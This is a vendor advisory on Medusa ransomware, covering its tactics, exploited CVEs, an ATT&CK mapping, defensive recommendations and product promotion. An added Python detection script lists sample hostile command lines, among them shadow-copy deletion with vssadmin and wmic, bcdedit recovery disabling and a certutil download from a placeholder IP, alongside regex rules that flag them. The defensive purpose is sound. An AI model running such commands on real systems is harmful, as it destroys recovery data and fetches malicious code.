1. Overview of Medusa Ransomware

First observed in 2019, the Medusa ransomware (also known as MedusaLocker) operates under a ransomware-as-a-service (RaaS) business model. It mainly targets the healthcare and educational sectors, as well as enterprises that process high volumes of personally identifiable information (PII). Medusa affiliates typically employ a double extortion tactic, stealing the victim’s data before encrypting it. Victims are threatened with the sale or public release of their data if they do not pay the ransom. Attackers typically gain initial access through brute-force attacks on Remote Desktop Protocol (RDP), leaked RDP credentials, or spear-phishing attacks that steal user credentials.

Sangfor noted the urgent advisory issued by the Philippine Department of Information and Communications Technology (DICT), cautioning all organizations against Medusa ransomware and other prevalent attacks. For additional details, please refer to the DICT's official advisory: https://dict.gov.ph/wp-content/uploads/2023/09/DICT-Medusa-Advisory.pdf

In response to the recent surge in Medusa ransomware attacks in the Philippines, Sangfor has collected an extensive list of Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) related to Medusa, as seen in the wild by our Neural-X Threat Intelligence platform.

Sangfor Neural-X gathers threat intelligence data from multiple external sources and correlates it with anonymized data seen in the wild to obtain the latest IOC and TTP information and help you stay secure.

Disclaimer: Threat actors commonly use different TTPs, IOCs, and tools to bypass and infiltrate different network setups. They may continually adapt by using other or newer tools for greater effectiveness in executing their attacks. Thus, the IOCs and TTPs provided in this article may not fully represent all IOCs and TTPs used in Medusa ransomware attacks. We recommend subscribing to Sangfor Neural-X Threat Intelligence feeds to fully access the latest threat intelligence data and improve effectiveness in detecting and preventing other malicious activities and tools.

Contact your nearest Sangfor office to explore suitable solutions and services that best meet your needs in staying resilient against Medusa Ransomware attacks.

2. Analysis of Medusa Ransomware

2.1 Description of Medusa Ransomware

The Medusa ransomware group has escalated its activities since March 2023, increasingly targeting global enterprises. The group launched the "Medusa Blog" to leak data exfiltrated from victims who refused to pay. Information on several victims has been published on this blog, as shown in the figure below.

Security Advisory on Medusa Ransomware 1

Our threat intelligence data reveals that Medusa commonly exploited the following vulnerabilities, among others:

  • CVE-2022-2294: Heap buffer overflow vulnerability in WebRTC
  • CVE-2022-2295: Type confusion vulnerability in Google Chrome V8
  • CVE-2022-21999: Windows Print Spooler elevation of privilege vulnerability
  • CVE-2018-13379: FortiOS path traversal vulnerability

To mitigate these vulnerabilities, it is critical to keep all software up to date, as adversaries continually adapt their TTPs to maximize the success rate of attacks.

After the ransomware executable runs, a ransom note file is dropped. Encrypted files are appended with the ".MEDUSA" extension. The ransom note contains the attacker’s contact details in the form of a Tor browser link, the payment method, and the ransom amount for decryption. The ransom note file is usually named "!!READ_ME_MEDUSA!!!.txt".

Below is a sample of a Medusa ransom note in a text file format:


Below is a sample of files encrypted by Medusa ransomware:


2.2 MITRE ATT&CK Mapping

Below is a list of tactics, techniques, and procedures (TTPs) associated with Medusa ransomware, mapped against the MITRE ATT&CK framework. It serves as a guideline for identifying malicious or suspicious events related to Medusa ransomware. Readers are advised to use this as a guide and not as a strict checklist for identifying Medusa TTPs, which may differ between attacks.

| Tactic | Technique | Sub-technique | Description/Procedure |
|---|---|---|---|
| TA0001 Initial Access | T1078 Valid Accounts | T1078.003 Local Accounts | Through brute forcing or compromised credentials of legitimate RDP accounts |
| TA0001 Initial Access | T1566 Phishing | T1566.001 Spearphishing Attachment | Gain initial access via phishing email attachments |
| TA0001 Initial Access | T1133 External Remote Services | N/A | Access the victim's network through an RDP service |
| TA0002 Execution | T1059 Command and Scripting Interpreter | T1059.003 Windows Command Shell | Use a series of Windows commands such as bcdedit.exe and vssadmin |
| TA0002 Execution | T1047 Windows Management Instrumentation | N/A | Use the Windows Management Instrumentation Command-line (WMIC) to delete shadow copies |
| TA0005 Defense Evasion | T1562 Impair Defenses | T1562.001 Disable or Modify Tools | Terminate services or processes related to anti-virus/security tools |
| TA0005 Defense Evasion | T1562 Impair Defenses | T1562.009 Safe Mode Boot | Abuse safe mode to evade endpoint detection |
| TA0006 Credential Access | T1110 Brute Force | T1110.002 Password Cracking | Brute force the password of the local RDP account |
| TA0007 Discovery | T1057 Process Discovery | N/A | Enumerate all running processes in the current system environment |
| TA0007 Discovery | T1083 File and Directory Discovery | N/A | Query the specified files, folders, and file extensions |
| TA0007 Discovery | T1135 Network Share Discovery | N/A | Enumerate network shares |
| TA0008 Lateral Movement | T1021 Remote Services | T1021.001 Remote Desktop Protocol | Use RDP for lateral movement |
| TA0008 Lateral Movement | T1021 Remote Services | T1021.002 SMB/Windows Admin Shares | Lateral movement via SMB |
| TA0011 Command and Control | T1105 Ingress Tool Transfer | N/A | Use certutil to download malicious files |
| TA0040 Impact | T1490 Inhibit System Recovery | N/A | Delete shadow copies and disable the Windows System Recovery feature |
| TA0040 Impact | T1489 Service Stop | N/A | Terminate processes and services related to database servers, mail servers, and backups |
| TA0040 Impact | T1486 Data Encrypted for Impact | N/A | Use the AES-256 algorithm to encrypt files on the computer |
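As an added example that is not part of the advisory and not Sangfor's own detection logic, the Python script below turns several of the mapped techniques above into simple detection rules and runs them over constructed process-creation and failed-logon records. The regexes, record field names, host names and the failed-logon threshold are assumptions chosen for illustration.

```python
import re
from collections import Counter

# Constructed sample records (not from the advisory), in the shape a SIEM would hand
# to a detection rule: process-creation events plus a burst of failed logons.
SAMPLE_EVENTS = [
    {"type": "process", "host": "FS01", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "process", "host": "FS01", "cmd": "wmic.exe shadowcopy delete"},
    {"type": "process", "host": "FS01", "cmd": "bcdedit.exe /set {default} recoveryenabled no"},
    {"type": "process", "host": "FS01", "cmd": "bcdedit.exe /set {default} safeboot network"},
    {"type": "process", "host": "WS07", "cmd": "certutil.exe -urlcache -split -f http://203.0.113.10/x.exe x.exe"},
    {"type": "process", "host": "WS07", "cmd": "notepad.exe C:\\Users\\a\\!!READ_ME_MEDUSA!!!.txt"},
    {"type": "process", "host": "WS07", "cmd": "explorer.exe C:\\Finance\\Q3.xlsx.MEDUSA"},
    {"type": "process", "host": "WS07", "cmd": "svchost.exe -k netsvcs"},  # benign, should not alert
] + [{"type": "logon_failure", "host": "FS01", "src": "198.51.100.7", "user": f"u{i}"} for i in range(12)]

# One rule per mapped technique: (ATT&CK ID, description, regex over the command line).
# The regexes are illustrative assumptions, not Sangfor signatures.
PROCESS_RULES = [
    ("T1490", "shadow copies deleted with vssadmin", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("T1047", "shadow copies deleted via WMIC", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("T1490", "Windows recovery disabled with bcdedit", re.compile(r"bcdedit(\.exe)?.*recoveryenabled\s+no", re.I)),
    ("T1562.009", "safe mode boot configured with bcdedit", re.compile(r"bcdedit(\.exe)?.*\bsafeboot\b", re.I)),
    ("T1105", "certutil used to fetch a remote file", re.compile(r"certutil(\.exe)?.*-urlcache.*https?://", re.I)),
    ("T1486", "Medusa ransom note or .MEDUSA file referenced", re.compile(r"READ_ME_MEDUSA|\.MEDUSA\b", re.I)),
]

RDP_FAIL_THRESHOLD = 10  # assumed tuning value: failed logons per source before alerting


def detect(events, fail_threshold=RDP_FAIL_THRESHOLD):
    """Return a list of (technique, description, host, evidence) tuples."""
    alerts = []
    failures = Counter()  # (host, source IP) -> failed logon count, for T1110
    for ev in events:
        if ev["type"] == "process":
            for tech, desc, pattern in PROCESS_RULES:
                if pattern.search(ev["cmd"]):
                    alerts.append((tech, desc, ev["host"], ev["cmd"]))
        elif ev["type"] == "logon_failure":
            failures[(ev["host"], ev["src"])] += 1
    for (host, src), count in failures.items():
        if count >= fail_threshold:
            alerts.append(("T1110", f"{count} failed logons from one source (RDP brute force)", host, src))
    return alerts


def techniques_hit(alerts):
    """Sorted, de-duplicated ATT&CK IDs present in a list of alerts."""
    return sorted({a[0] for a in alerts})


if __name__ == "__main__":
    for tech, desc, host, evidence in detect(SAMPLE_EVENTS):
        print(f"[{tech}] {host}: {desc} -> {evidence}")
```

In a real deployment the records would come from Sysmon/Security event logs or an EDR, and each rule should be tuned against the environment's baseline of legitimate administrative activity.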

 

2.3 Indicators of Compromise (IOCs)

2.3.1 File Hashes

Make sure that your endpoint security solution and other security tools are configured to detect, identify, and alert you about malicious files commonly associated with Medusa ransomware. The file hashes of these files are as follows:


 

2.3.2 Command and Control (C2) IP Addresses

Adversaries often use different IP addresses for command and control (C2) to evade detection by security controls. Below is a list of IP addresses observed by our threat intelligence initiating Medusa C2 connections.

Disclaimer: The list below does not represent an up-to-date and exhaustive list after the time of this article’s publication. Threat actors regularly update their TTPs and IP addresses to improve the effectiveness of attacks. All data shared in this document should be treated as a guideline. Apply defense-in-depth using multiple layers of cyber security controls to ensure higher threat detection and protection capability.


3. Recommendations to Prevent Medusa Ransomware

Sangfor leverages the experience of its Cyber Guardian Incident Response (IR) team in managing ransomware attacks and other cyber threats. We offer the following recommendations in relation to people, processes, and technology to keep you secure against Medusa and other ransomware variants.

Process

  1. Conduct technical security assessments, such as vulnerability assessment and penetration testing (VAPT), to identify all security loopholes and vulnerabilities. Ensure unused remote access ports such as TCP/3389 (RDP) and the ports of other remote access applications (e.g., TeamViewer, AnyDesk, and VPN) are disabled from public Internet access or restricted only to selected users and/or IP addresses.
  2. Register for Sangfor’s Ransomware Exposure Assessment service to identify commonly abused security gaps in ransomware attacks. This service uses Sangfor Endpoint Secure to automate the assessment and generate a report on your ransomware exposure level and risks. Security experts from the Cyber Guardian services team apply their experience in offense and defense to identify critical findings and prioritize remediation efforts.
  3. Only provision remote access applications (e.g., TeamViewer, AnyDesk, and VPN) that support two-factor or multi-factor authentication (i.e., 2FA or MFA). Consider the Sangfor Network Secure next-generation firewall if your current VPN does not support 2FA/MFA.
  4. Configure all admin-privileged or remote access accounts with long and strong passwords. Enhance password policy with best practices, such as passwords with a minimum of twelve (12) characters and a combination of letters, numbers, and special characters. Periodically change the password with a relatively different structure and pattern to prevent brute force attempts.
  5. Errors and alerts in security controls must be monitored at all times to detect anomalies (e.g., disabled antivirus, suspicious remote connection, malicious files or command execution) and responded to with industry best practices in a timely manner to stop any attack attempts. Consider a Managed Detection and Response (MDR) service, such as Sangfor Cyber Guardian MDR, to manage security threats on a 24x7 basis with industry best practices applied in responding to all security threats by security experts with experienced backgrounds.
  6. Ensure servers, firmware, and software are updated to the latest versions on a timely basis.
  7. Carefully manage or restrict the use of personal devices on the corporate network. This prevents threats on personal devices from spreading to the company’s IT assets or network.

Technology

1. Ensure endpoint security or antivirus (AV) software is installed and always updated with the latest virus signatures. Consider endpoint security with anti-ransomware capabilities, such as Sangfor Endpoint Secure, with features such as (but not limited to):


a. Ransomware Honeypot: Uses decoy files to detect ransomware encryption to kill the encryption process in real time.

b. Micro-segmentation: Blocks ports and host access to prevent the propagation of attacks or the spread of infection.

c. Fileless protection: Stops PowerShell command execution without authorization.

d. RDP brute force attack protection: Limits, detects, and stops multiple password-guessing attempts.

e. Additionally, Sangfor Endpoint Secure cannot be easily disabled by attackers seeking to bypass it and run malicious files, as shown below.

f. Perform a full organization-wide antivirus scan to ensure all malicious files noted in this investigation are identified and removed.

2. Consider the Sangfor Anti-Ransomware solution if you currently do not have technology controls capable of managing ransomware attacks in all stages of the ransomware kill chain, as shown below:


3. Subscribe to Sangfor Neural-X Threat Intelligence for the latest IOCs and TTPs observed in the wild and from various third-party threat intelligence sources. Alternatively, verify any suspicious data through Sangfor’s threat intelligence webpage: https://sec.sangfor.com.cn/index/abroad?lang=EN-US

People

  1. Educate and remind staff that all remote access applications should be closed or disabled when not in use. Set an auto-logoff control to terminate any remote connections that have been inactive for over 5 minutes.
  2. Conduct periodic staff awareness training or notification on the latest social engineering techniques used by Medusa and other threat actors. Conduct assessments or simulated social engineering drills to verify the staff’s level of understanding.
  3. Hire security experts with the right offensive and defensive experience to continuously monitor and respond to threats using mature and proven response processes in accordance with the company’s risk tolerance and risk management strategies.

4. Sangfor Solutions

4.1 Sangfor Endpoint Secure

Sangfor Endpoint Secure is a comprehensive endpoint security solution designed to protect endpoint devices against malicious threats, including ransomware like Medusa. It uses a multi-layered detection and response approach that includes static and dynamic behavioral detection engines and an AI-enabled detection engine, which is trained with thousands of real attack samples seen across our customers’ environments. It achieves over 99.83% detection accuracy and has defended 12 million endpoint devices. Sangfor Endpoint Secure is also the world’s first endpoint security solution integrating a ransomware honeypot. By setting up decoy files, it instantly kills the ransomware encryption process once detected and offers One-Click Kill to remove the ransomware from all infected devices.


4.2 Sangfor Network Secure

Sangfor Network Secure (formerly Sangfor NGAF) is a converged next-generation firewall effective against advanced threats like ransomware, advanced persistent threats (APTs), web application attacks, and IoT exploits. It integrates multiple security features, including intrusion prevention system (IPS), application control, cloud deception, and web application firewall (WAF), and uses AI-enabled Sangfor Engine Zero and Neural-X for detecting emerging and 0-day threats. When integrated with Sangfor Endpoint Secure, both systems exchange threat intelligence and correlate events for improved detection of stealthy behavior like C2 communication. The single dashboard offers a comprehensive threat overview and enables administrators to quickly quarantine malicious processes, making it a robust tool for early-phase ransomware mitigation.

4.3 Sangfor Cyber Command

Sangfor Cyber Command is a Network Detection and Response (NDR) platform that provides proactive defense against cyber threats like ransomware. It continuously monitors and analyzes network traffic in real time to detect threats that have breached the network. Utilizing AI-driven analytics and real-time threat intelligence feeds, it detects 95% of network anomalies, including signs of ransomware activity. Cyber Command also provides insights into vulnerabilities, such as weak passwords and uninstalled patches, enabling security teams to mitigate risks before they can be exploited. The platform integrates seamlessly with Sangfor and third-party security products to provide automated incident response. Analysts get enhanced visibility and tools for in-depth investigation, allowing for prompt remediation and bolstering overall security posture.

4.4 Sangfor Anti-Ransomware Solution

The Sangfor Anti-Ransomware Solution takes a comprehensive approach to ransomware protection by breaking every step of the "Ransomware Kill Chain," a specific sequence of events that includes infection, C2 communication, exploitation, and lateral movement. Individual security products like network firewalls and antivirus often fall short due to gaps between their spheres of influence, as demonstrated by the Medusa ransomware that infected thousands of systems across the Philippines in a matter of days. Sangfor’s solution fills these gaps, providing a more holistic and effective defense strategy against ransomware attacks.


4.5 Sangfor Cyber Guardian MDR Service

The Cyber Guardian MDR service provides organizations that have limited security capabilities with essential threat detection and response services. The service uses a variety of Sangfor security technologies to continuously monitor your network to detect threats. Security experts are on duty 24x7 to analyze security alerts, rapidly respond to threats, and investigate incidents to improve your security posture.

Against the backdrop of a surge in ransomware activities, Sangfor will be introducing a new service component in the Cyber Guardian MDR service that is designed to evaluate our customers’ IT assets, identify vulnerabilities and weaknesses that are commonly exploited by ransomware, and provide necessary response actions and recommendations to prevent the possibility of a ransomware attack. This evaluation will be provided using a combination of Sangfor Endpoint Secure and other tools.

This evaluation service will be available as part of the Sangfor Cyber Guardian MDR service by the end of October 2023, so do register your interest with your local Sangfor sales representatives.
